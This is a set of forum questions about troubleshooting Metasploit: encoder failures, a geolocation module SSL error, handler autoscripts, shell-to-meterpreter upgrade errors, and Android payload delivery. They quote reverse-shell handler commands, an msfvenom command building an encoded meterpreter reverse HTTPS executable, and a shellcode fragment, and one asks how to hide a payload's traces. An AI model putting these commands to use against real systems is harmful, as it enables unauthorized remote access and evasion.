All encoders failed to encode metasploit

I am trying to use this exploit on HTB :

pretty simple yet metasploit gives me an error : all encoders failed to encode

I have spent hours trying to find a solution but I found nothing :/

This is screenshot for the error

Metasploit version is 6.0.2-dev

Any solutions or steps to debug this?

Metasploit unable to get local issuer certificate

I got the following versions: Framework: 5.0.86-dev Console: 5.0.86-dev

The os that metasploit is installed are windows 10.

I get a meterpreter session with an android device (genymotion virtual machine) device and desktop are on the same network and also device has enabled gps with pre-defined lat & long and when I enter the following command in meterpreter:

run post/multi/gather/wlan_geolocate APIKEY=my google map API key (clean, without quotes or anything else) GEOLOCATE=true

I get the result in the photo with the error as I describe in the title, does anyone know if its a version SSL problem or something? how and where to search to fix this problem?

enter image description here

autoscript metasploit

Im trying to run the following autoscript

use exploit/multi/handler set payload … set lhost set lport set exitonsession false exploit -j shell powershell command 

it happens that when it opens a session it runs shell but after that it doesn’t run the powershell commands

there are post modules that allow run powershell scripts but I would like to know how to automate run powershell commands through a shell or other way without using scripts


Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp payload => windows/x64/shell_reverse_tcp msf5 exploit(multi/handler) > set LPORT 549  LPORT => 443 msf5 exploit(multi/handler) > set LHOST LHOST => msf5 exploit(multi/handler) > run  [*] Started reverse TCP handler on  [*] Command shell session 1 opened ( -> at 2020-05-30 22:31:25 -0400   Login: password You have a shell have fun #> background  Background session 1? [y/N]  y msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]  

The Issue:

[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on  [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass [-] Call stack: [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32' [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token' [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec' [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?' [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'  

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

specific metasploit question about handler

Can the handler exploit/multi/handler handle a connection from another type of payload ?
payload generation : msfvenom LHOST=”IP” LPORT=”PORT” -f exe -e x86/shikata_ga_nai -p windows/meterpreter_reverse_https -o payload.exe listener : msfconsole; use exploit/multi/handler, set payload windows/meterpreter_reverse_tcp, set LHOST , set LPORT , exploit when the target launch the “payload.exe”, a session will open in the attacker console ?

metasploit payload

I’m use the ms f venom to make a payload app for android and i share the app to may another phone with it own network then i install the app but there was no reaction in my listener phone for host i use my listener IP that was in the info of phone what IP i have to use and the payload has to be on – t c p – or HTTP when i use the same network for my phones payload is worked thanks for Ur react .

Need some clarifications about generated Metasploit payloads

  1. When I generate a payload in Metasploit I see something like this in the output results:

buf = “\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52” + “\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26” + “\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d” + “\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0” +

What are these Hex values represents?

  1. When I generate a payload for Windows architecture (.exe output type), is the generated file a binary file or a PowerShell script?

  2. What is the difference between output type and format for a generated payload?

  3. When a Stager establishes a connection between pentester and target system, do we consider this Stager as the actual exploit, or it needs a seperate exploit module to run BEFORE Stager takes place?

  4. If someone have the chance to execute manually a payload in the target system, how can he hide any trace of the running payload? Is DLL injection possible?